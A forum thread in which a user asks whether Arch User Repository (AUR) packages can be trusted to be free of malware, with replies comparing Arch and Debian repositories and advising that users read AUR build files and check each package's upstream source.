I have installed only one package from AUR namely google-earth-pro. I am paranoid about security but I don’t know how to analyze code and search for malware.
Can I trust AUR packages ? By “trust” I mean the packages must not contain any malware.
So far my experience with AUR is that sometimes the maintainer of some packages are late to update them. While this is not as dangerous as having malware but this is disappointing.
Short answer: mostly yes but not blindly.
Long answer:
Debian’s official repos are so huge that they don’t need something like AUR. At the same time some long time Linux users tell me that despite the fact that Arch’s main repos are much smaller than Debian Arch has an advantage. The advantage that Arch has is better maintained repos. I was told that Debian has very very old and unmaintained packages in their repos.
Bottom line: I haven’t yet found a distro which excels in all areas.
The AUR also contains some proprietary software that one may need and packaged for arch, like RStudio or zoom. Debian repo is only free software. But there is the option to use flatpaks or app images, which can also be used in arch but doesn’t make proprietary software any safer…
That will be unlikely to ever exist.
The AUR is considered a big plus in arch based systems. But for beginners it is mostly advised to not use it blindly and make sure to follow some rules, like inspect the primary source from which the software was packaged etc.
Asking this question on a distro’s forum that utilizes Arch repos and the AUR isn’t exactly an impartial place to ask this question. Most people here use it.
You shouldn’t take any of our replies for gospel. Only you can answer this question for yourself. It’s been well discussed here and in other parts of the very vast internet. Research.
Do you feel the AUR is safe?
As I said I can’t check the code. What I do before installing any package from AUR is ask myself “is this is a popular package ?” My thinking if the package is installed by many users at least some of them must have the necessary knowledge to review the code. I guess lots of Arch users must be using google-earth-pro.
Now if this is a sensible approach I am not sure.
I am not sure that the Arch repos are that much smaller to be honest. There are certainly packages in the Debian repos that aren’t in the Arch repos but there are also packages in the Arch repos that aren’t in the Debian repos.
Unfortunately, it is fairly difficult to compare repo sizes because the packaging is so different.
The vast majority of AUR packages don’t contain anything which requires special skills to check. The link above posted by @pebcak from @kresimir describes what you can check and how.
Some of the packages that are built from source are complicated and contain many patches and other things that can be hard to follow. However, these are exceptions. Most AUR packages are quite simple.
Checking most AUR packages doesn’t require a high degree of technical competency. It requires being willing to take the time read them.